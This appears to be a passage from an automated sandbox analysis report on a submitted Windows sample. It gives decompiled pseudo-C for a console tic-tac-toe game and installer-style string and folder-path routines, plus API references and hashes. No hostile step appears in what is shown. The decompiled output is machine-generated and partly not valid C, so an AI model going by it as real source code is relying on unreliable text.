				_t45 = _t44 + 0xc;
				if( *(0x10003000 + _t42 * 4) != 2) {
					E100013F0(_t39);
					_t42 = _v8;
				}
				_t16 = E10001530( *0x10004b3c);
				_t40 =  *0x10003028; // 0x1
				_t44 = _t45 + 4;
				_t17 = _t40;
				if(_t42 == _t16) {
					_t26 = _t17 & 0x80000001;
					if(_t26 < 0) {
						_t26 = (_t26 - 0x00000001 | 0xfffffffe) + 1;
					}
					asm("sbb eax, eax");
					_t39 = _t40 + 1;
					 *0x10003028 = _t40 + 1;
					 *(0x10003000 + _t42 * 4) = ( ~_t26 & 0xfffffffe) + 5;
					E10001140();
					0x10004b24->X = 0x14001e;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5),  *0x10004b24);
					_push("Player Wins");
					goto L2;
				}
				_t18 = _t17 & 0x80000001;
				__eflags = _t18;
				if(_t18 < 0) {
					_t18 = (_t18 - 0x00000001 | 0xfffffffe) + 1;
					__eflags = _t18;
				}
				asm("sbb eax, eax");
				 *0x10003028 = _t40 + 1;
				_t21 = ( ~_t18 & 0xfffffffe) + 5;
				__eflags = _t21;
				 *(0x10003000 + _t42 * 4) = _t21;
				E10001140();
				return E10001780(__eflags);
			}













                                                                                                  0x100013f0
                                                                                                  0x100013f3
                                                                                                  0x100013fb
                                                                                                  0x100013fd
                                                                                                  0x10001416
                                                                                                  0x1000141c
                                                                                                  0x10001421
                                                                                                  0x10001421
                                                                                                  0x10001426
                                                                                                  0x10001429
                                                                                                  0x10001431
                                                                                                  0x10001431
                                                                                                  0x10001438
                                                                                                  0x1000143d
                                                                                                  0x10001456
                                                                                                  0x10001461
                                                                                                  0x1000146f
                                                                                                  0x10001474
                                                                                                  0x10001477
                                                                                                  0x10001482
                                                                                                  0x10001484
                                                                                                  0x10001489
                                                                                                  0x10001489
                                                                                                  0x10001492
                                                                                                  0x10001497
                                                                                                  0x1000149d
                                                                                                  0x100014a2
                                                                                                  0x100014a4
                                                                                                  0x100014a6
                                                                                                  0x100014ab
                                                                                                  0x100014b1
                                                                                                  0x100014b1
                                                                                                  0x100014b4
                                                                                                  0x100014b6
                                                                                                  0x100014ba
                                                                                                  0x100014c3
                                                                                                  0x100014ca
                                                                                                  0x100014cf
                                                                                                  0x100014e8
                                                                                                  0x100014ee
                                                                                                  0x00000000
                                                                                                  0x100014ee
                                                                                                  0x100014f8
                                                                                                  0x100014f8
                                                                                                  0x100014fd
                                                                                                  0x10001503
                                                                                                  0x10001503
                                                                                                  0x10001503
                                                                                                  0x10001506
                                                                                                  0x1000150c
                                                                                                  0x10001512
                                                                                                  0x10001512
                                                                                                  0x10001515
                                                                                                  0x1000151c
                                                                                                  0x1000152a

                                                                                                  APIs
                                                                                                  • GetStdHandle.KERNEL32(000000F5,?,?,100013E5), ref: 1000140F
                                                                                                  • SetConsoleCursorPosition.KERNEL32(00000000,?,?,100013E5), ref: 10001416
                                                                                                  • _printf.MSPDB140-MSVCRT ref: 10001421
                                                                                                  • _getch.MSVCRT ref: 10001429
                                                                                                  • exit.MSVCRT ref: 10001431
                                                                                                  • GetStdHandle.KERNEL32(000000F5,?,?,?,100013E5), ref: 1000144F
                                                                                                  • SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,100013E5), ref: 10001456
                                                                                                  • _printf.MSPDB140-MSVCRT ref: 10001461
                                                                                                  • GetStdHandle.KERNEL32(000000F5,?,?,?,100013E5), ref: 100014E1
                                                                                                  • SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,100013E5), ref: 100014E8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.235460951.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.235453419.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235467539.0000000010002000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235472130.0000000010003000.00000040.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235488746.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: ConsoleCursorHandlePosition$_printf$_getchexit
                                                                                                  • String ID: Game Draw$Player Wins$Your Turn :>
                                                                                                  • API String ID: 1169941056-2104098960
                                                                                                  • Opcode ID: c7c91d8cf9948d624a7cac9d628c288ba56032466b15ea77a0d48c50d88a4a73
                                                                                                  • Instruction ID: bb798e52d5f0db548a3259760b61d7a88d8b66ae99ac6efbd1eb77fd75214514
                                                                                                  • Opcode Fuzzy Hash: c7c91d8cf9948d624a7cac9d628c288ba56032466b15ea77a0d48c50d88a4a73
                                                                                                  • Instruction Fuzzy Hash: 88218076810224EBF7159FB4CE8A6CA3B68EB093E2B104315F226C61BEDB75D444C726
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 10001330, Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 46processCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 70%
                                                                                                  			E10001330(signed int __ecx) {
				char _v8;
				void* _t12;
				void* _t14;

				_t18 = __ecx;
				system("cls");
				E10001690("\n--------MENU--------", __ecx);
				E10001690();
				E10001690("\n2 : Play with O", "\n1 : Play with X");
				E10001690();
				E10001690("\nEnter your choice:>", "\n3 : Exit");
				E10001750("%d",  &_v8);
				 *0x10003028 = 1;
				_t12 = _v8 - 1;
				if(_t12 == 0) {
					 *0x10004b3c = 1;
					 *0x10004b38 = 0;
					return E100013F0(_t18);
				} else {
					_t14 = _t12 - 1;
					if(_t14 == 0) {
						L5:
						 *0x10004b3c = 0;
						 *0x10004b38 = 1;
						return E10001780(__eflags);
					} else {
						if(_t14 == 1) {
							exit(1);
							goto L5;
						} else {
							return E10001330(_t18);
						}
					}
				}
			}






                                                                                                  0x10001330
                                                                                                  0x10001339
                                                                                                  0x10001344
                                                                                                  0x1000134e
                                                                                                  0x10001358
                                                                                                  0x10001362
                                                                                                  0x1000136c
                                                                                                  0x1000137a
                                                                                                  0x10001385
                                                                                                  0x1000138f
                                                                                                  0x10001392
                                                                                                  0x100013cc
                                                                                                  0x100013d6
                                                                                                  0x100013e8
                                                                                                  0x10001394
                                                                                                  0x10001394
                                                                                                  0x10001397
                                                                                                  0x100013af
                                                                                                  0x100013af
                                                                                                  0x100013b9
                                                                                                  0x100013cb
                                                                                                  0x10001399
                                                                                                  0x1000139c
                                                                                                  0x100013a9
                                                                                                  0x00000000
                                                                                                  0x1000139e
                                                                                                  0x100013a6
                                                                                                  0x100013a6
                                                                                                  0x1000139c
                                                                                                  0x10001397

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.235460951.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.235453419.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235467539.0000000010002000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235472130.0000000010003000.00000040.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235488746.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: _printf$exitsystem
                                                                                                  • String ID: --------MENU--------$1 : Play with X$2 : Play with O$3 : Exit$Enter your choice:>$cls
                                                                                                  • API String ID: 317515175-593122841
                                                                                                  • Opcode ID: 1c730f27932e051611968cb00b1b8b287e8b76facbc99f0d8d8db95d763b031b
                                                                                                  • Instruction ID: c53e1086591d60f6b1cfeec43a50231095aba2133065e645928d40a036651717
                                                                                                  • Opcode Fuzzy Hash: 1c730f27932e051611968cb00b1b8b287e8b76facbc99f0d8d8db95d763b031b
                                                                                                  • Instruction Fuzzy Hash: 730162B9846204ABF301EFE58C9A7EA77ACDB013C5F008144F90D5565ECB73A71487AA
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 10001140, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 61COMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 36%
                                                                                                  			E10001140() {
				short _t3;
				intOrPtr _t13;
				short _t16;
				signed int _t17;
				void* _t18;
				void* _t20;

				_t3 = 0x23;
				_t16 = 9;
				do {
					0x10004b24->X = _t3;
					 *0x10004b26 = _t16;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0x10004b24->X);
					_push("|       |");
					E10001690();
					_t16 = _t16 + 1;
					_t18 = _t18 + 4;
					_t3 = 0x23;
				} while (_t16 < 0x11);
				0x10004b24->X = 0xb001c;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0x10004b24->X);
				E10001690();
				0x10004b24->X = 0xe001c;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5),  *0x10004b24);
				E10001690("-----------------------", "-----------------------");
				_t20 = _t18 + 8;
				_t17 = 1;
				do {
					_t13 =  *((intOrPtr*)(0x10003000 + _t17 * 4));
					if(_t13 != 3) {
						if(_t13 == 5) {
							_push(_t17);
							_push(0x4f);
							goto L7;
						}
					} else {
						_push(_t17);
						_push(0x58);
						L7:
						_t13 = E100016C0();
						_t20 = _t20 + 8;
					}
					_t17 = _t17 + 1;
				} while (_t17 < 0xa);
				return _t13;
			}









                                                                                                  0x10001147
                                                                                                  0x10001154
                                                                                                  0x10001160
                                                                                                  0x10001160
                                                                                                  0x10001166
                                                                                                  0x10001178
                                                                                                  0x1000117a
                                                                                                  0x1000117f
                                                                                                  0x10001184
                                                                                                  0x10001185
                                                                                                  0x10001188
                                                                                                  0x1000118d
                                                                                                  0x10001192
                                                                                                  0x100011a7
                                                                                                  0x100011ae
                                                                                                  0x100011b6
                                                                                                  0x100011cb
                                                                                                  0x100011d2
                                                                                                  0x100011d7
                                                                                                  0x100011da
                                                                                                  0x100011e0
                                                                                                  0x100011e0
                                                                                                  0x100011ea
                                                                                                  0x100011f4
                                                                                                  0x100011f6
                                                                                                  0x100011f7
                                                                                                  0x00000000
                                                                                                  0x100011f7
                                                                                                  0x100011ec
                                                                                                  0x100011ec
                                                                                                  0x100011ed
                                                                                                  0x100011f9
                                                                                                  0x100011f9
                                                                                                  0x100011fe
                                                                                                  0x100011fe
                                                                                                  0x10001201
                                                                                                  0x10001202
                                                                                                  0x1000120a

                                                                                                  APIs
                                                                                                  • GetStdHandle.KERNEL32(000000F5,?,?,?,1000143D,?,?,?,100013E5), ref: 10001175
                                                                                                  • SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,1000143D,?,?,?,100013E5), ref: 10001178
                                                                                                  • _printf.MSPDB140-MSVCRT ref: 1000117F
                                                                                                  • GetStdHandle.KERNEL32(000000F5,100013E5), ref: 100011A4
                                                                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 100011A7
                                                                                                  • _printf.MSPDB140-MSVCRT ref: 100011AE
                                                                                                  • GetStdHandle.KERNEL32(000000F5), ref: 100011C8
                                                                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 100011CB
                                                                                                  • _printf.MSPDB140-MSVCRT ref: 100011D2
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.235460951.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.235453419.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235467539.0000000010002000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235472130.0000000010003000.00000040.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235488746.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: ConsoleCursorHandlePosition_printf
                                                                                                  • String ID: -----------------------$-----------------------$| |
                                                                                                  • API String ID: 1663292651-3813270350
                                                                                                  • Opcode ID: 5895f20bdd4262a172f28bb76886125ef7f415be6b547757560fce57a2e2be27
                                                                                                  • Instruction ID: 620ce55c2a8674103cdc61108c456ab59311865f7ca033f5c70fdabedfbe9187
                                                                                                  • Opcode Fuzzy Hash: 5895f20bdd4262a172f28bb76886125ef7f415be6b547757560fce57a2e2be27
                                                                                                  • Instruction Fuzzy Hash: 1B116BF6901170ABF610EB959DC5FC73A9CDB493E1F160120F614932BADB75D800866A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00405D46, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197stringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 74%
                                                                                                  			E00405D46(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				signed int _t74;
				signed int _t75;
				intOrPtr _t79;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t79 =  *0x7a1f7c; // 0x891203
					_t36 =  *(_t79 - 4 + _t36 * 4);
				}
				_t74 =  *0x7a27d8 + _t36;
				_t37 = 0x7a1740;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x7a1740;
				if(_a4 - 0x7a1740 < 0x800) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x400;
					if(_t86 - _t37 >= 0x400) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E00405D46(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x7a1740;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xa) + 0x7a3000;
							E00405D24(_t86, (_t95 << 0xa) + 0x7a3000);
						} else {
							E00405C82(_t86,  *0x7a27a8);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405F86(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x7a2824;
						if( *0x7a2824 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x400);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x7a27a4;
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x7a27a8,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x7a27a8,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x400);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x7a27d8;
							E00405C0B(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x7a27d8, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405D46(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405D24(_a4, _t37);
			}





























                                                                                                  0x00405d46
                                                                                                  0x00405d46
                                                                                                  0x00405d46
                                                                                                  0x00405d4c
                                                                                                  0x00405d51
                                                                                                  0x00405d53
                                                                                                  0x00405d62
                                                                                                  0x00405d62
                                                                                                  0x00405d6d
                                                                                                  0x00405d6f
                                                                                                  0x00405d74
                                                                                                  0x00405d77
                                                                                                  0x00405d78
                                                                                                  0x00405d7f
                                                                                                  0x00405d81
                                                                                                  0x00405d87
                                                                                                  0x00405d8a
                                                                                                  0x00405d8a
                                                                                                  0x00405f63
                                                                                                  0x00405f63
                                                                                                  0x00405f67
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00405d97
                                                                                                  0x00405d9d
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00405da3
                                                                                                  0x00405da4
                                                                                                  0x00405da7
                                                                                                  0x00405daa
                                                                                                  0x00405f56
                                                                                                  0x00405f60
                                                                                                  0x00405f62
                                                                                                  0x00405f62
                                                                                                  0x00405f58
                                                                                                  0x00405f5a
                                                                                                  0x00405f5c
                                                                                                  0x00405f5d
                                                                                                  0x00405f5d
                                                                                                  0x00000000
                                                                                                  0x00405f56
                                                                                                  0x00405db0
                                                                                                  0x00405db4
                                                                                                  0x00405dc4
                                                                                                  0x00405dc8
                                                                                                  0x00405dcf
                                                                                                  0x00405dd2
                                                                                                  0x00405dd6
                                                                                                  0x00405ddc
                                                                                                  0x00405ddf
                                                                                                  0x00405de2
                                                                                                  0x00405de5
                                                                                                  0x00405f00
                                                                                                  0x00405f03
                                                                                                  0x00405f33
                                                                                                  0x00405f36
                                                                                                  0x00405f3b
                                                                                                  0x00405f3f
                                                                                                  0x00405f3f
                                                                                                  0x00405f44
                                                                                                  0x00405f45
                                                                                                  0x00405f4a
                                                                                                  0x00405f4d
                                                                                                  0x00405f4f
                                                                                                  0x00000000
                                                                                                  0x00405f4f
                                                                                                  0x00405f05
                                                                                                  0x00405f08
                                                                                                  0x00405f1d
                                                                                                  0x00405f24
                                                                                                  0x00405f0a
                                                                                                  0x00405f11
                                                                                                  0x00405f11
                                                                                                  0x00405f2c
                                                                                                  0x00405f2f
                                                                                                  0x00405ef8
                                                                                                  0x00405ef9
                                                                                                  0x00405ef9
                                                                                                  0x00000000
                                                                                                  0x00405f2f
                                                                                                  0x00405ded
                                                                                                  0x00405dee
                                                                                                  0x00405df4
                                                                                                  0x00405df6
                                                                                                  0x00405e10
                                                                                                  0x00405e10
                                                                                                  0x00405e17
                                                                                                  0x00405e17
                                                                                                  0x00405e1e
                                                                                                  0x00405e22
                                                                                                  0x00405e22
                                                                                                  0x00405e23
                                                                                                  0x00405e25
                                                                                                  0x00405e5e
                                                                                                  0x00405e61
                                                                                                  0x00405e71
                                                                                                  0x00405e74
                                                                                                  0x00405e7c
                                                                                                  0x00405e82
                                                                                                  0x00405e82
                                                                                                  0x00405ede
                                                                                                  0x00405ede
                                                                                                  0x00405ee0
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00405e86
                                                                                                  0x00405e8d
                                                                                                  0x00405e8e
                                                                                                  0x00405e90
                                                                                                  0x00405eaa
                                                                                                  0x00405eb8
                                                                                                  0x00405ebe
                                                                                                  0x00405ec0
                                                                                                  0x00405edb
                                                                                                  0x00405edb
                                                                                                  0x00405edb
                                                                                                  0x00000000
                                                                                                  0x00405edb
                                                                                                  0x00405ec6
                                                                                                  0x00405ed1
                                                                                                  0x00405ed7
                                                                                                  0x00405ed9
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00405ed9
                                                                                                  0x00405e92
                                                                                                  0x00405e95
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00405ea4
                                                                                                  0x00405ea6
                                                                                                  0x00405ea8
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00405ea8
                                                                                                  0x00000000
                                                                                                  0x00405ede
                                                                                                  0x00405e69
                                                                                                  0x00000000
                                                                                                  0x00405e27
                                                                                                  0x00405e2c
                                                                                                  0x00405e42
                                                                                                  0x00405e47
                                                                                                  0x00405e4a
                                                                                                  0x00405ee7
                                                                                                  0x00405ee7
                                                                                                  0x00405eeb
                                                                                                  0x00405ef3
                                                                                                  0x00405ef3
                                                                                                  0x00000000
                                                                                                  0x00405eeb
                                                                                                  0x00405e54
                                                                                                  0x00405ee2
                                                                                                  0x00405ee2
                                                                                                  0x00405ee5
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00405ee5
                                                                                                  0x00405e25
                                                                                                  0x00405df8
                                                                                                  0x00405dfc
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00405dfe
                                                                                                  0x00405e02
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00405e04
                                                                                                  0x00405e08
                                                                                                  0x00000000
                                                                                                  0x00405e0a
                                                                                                  0x00405e0a
                                                                                                  0x00000000
                                                                                                  0x00405e0a
                                                                                                  0x00405e08
                                                                                                  0x00405f6d
                                                                                                  0x00405f77
                                                                                                  0x00405f83
                                                                                                  0x00405f83
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                  • GetVersion.KERNEL32(?,0079E578,00000000,00405048,0079E578,00000000), ref: 00405DEE
                                                                                                  • GetSystemDirectoryA.KERNEL32 ref: 00405E69
                                                                                                  • GetWindowsDirectoryA.KERNEL32(HfkcdoekxlzOjbt,00000400), ref: 00405E7C
                                                                                                  • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405EB8
                                                                                                  • SHGetPathFromIDListA.SHELL32(00000000,HfkcdoekxlzOjbt), ref: 00405EC6
                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00405ED1
                                                                                                  • lstrcatA.KERNEL32(HfkcdoekxlzOjbt,\Microsoft\Internet Explorer\Quick Launch), ref: 00405EF3
                                                                                                  • lstrlenA.KERNEL32(HfkcdoekxlzOjbt,?,0079E578,00000000,00405048,0079E578,00000000), ref: 00405F45
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                  • String ID: HfkcdoekxlzOjbt$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                  • API String ID: 900638850-914065445
                                                                                                  • Opcode ID: 9a7fc9aa2756331657853379cb9517c1fa59f60044e7e7e8b42bc65ab8194b8b
                                                                                                  • Instruction ID: f3379658f76e61b6bf464943ca4455bb4baefa90c5fe634512cd2817f5000309
                                                                                                  • Opcode Fuzzy Hash: 9a7fc9aa2756331657853379cb9517c1fa59f60044e7e7e8b42bc65ab8194b8b
                                                                                                  • Instruction Fuzzy Hash: 3251E531904A05ABDF219B28CC8877F3BA4EB56714F14823BE551BA2D1D33C4A42DF9E
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00405010, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00405010(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x7a1f84; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x7a2854;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405D46(0, _t39, 0x79e578, 0x79e578, _a4);
					}
					_t26 = lstrlenA(0x79e578);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x7a1f68, 0x79e578);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x79e578;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x79e578)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x79e578, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                                                                  0x00405016
                                                                                                  0x00405022
                                                                                                  0x00405025
                                                                                                  0x0040502b
                                                                                                  0x00405037
                                                                                                  0x0040503a
                                                                                                  0x0040503d
                                                                                                  0x00405043
                                                                                                  0x00405043
                                                                                                  0x00405049
                                                                                                  0x00405051
                                                                                                  0x00405054
                                                                                                  0x00405071
                                                                                                  0x00405075
                                                                                                  0x0040507e
                                                                                                  0x0040507e
                                                                                                  0x00405088
                                                                                                  0x00405091
                                                                                                  0x0040509d
                                                                                                  0x004050a4
                                                                                                  0x004050a8
                                                                                                  0x004050ab
                                                                                                  0x004050be
                                                                                                  0x004050cc
                                                                                                  0x004050cc
                                                                                                  0x004050d0
                                                                                                  0x004050d2
                                                                                                  0x004050d5
                                                                                                  0x00000000
                                                                                                  0x004050d5
                                                                                                  0x00405056
                                                                                                  0x0040505e
                                                                                                  0x00405066
                                                                                                  0x0040506c
                                                                                                  0x00000000
                                                                                                  0x0040506c
                                                                                                  0x00405066
                                                                                                  0x00405054
                                                                                                  0x004050df

                                                                                                  APIs
                                                                                                  • lstrlenA.KERNEL32(0079E578,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C7D,00000000,?), ref: 00405049
                                                                                                  • lstrlenA.KERNEL32(00402C7D,0079E578,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C7D,00000000), ref: 00405059
                                                                                                  • lstrcatA.KERNEL32(0079E578,00402C7D,00402C7D,0079E578,00000000,00000000,00000000), ref: 0040506C
                                                                                                  • SetWindowTextA.USER32(0079E578,0079E578), ref: 0040507E
                                                                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050A4
                                                                                                  • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004050BE
                                                                                                  • SendMessageA.USER32(?,00001013,?,00000000), ref: 004050CC
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
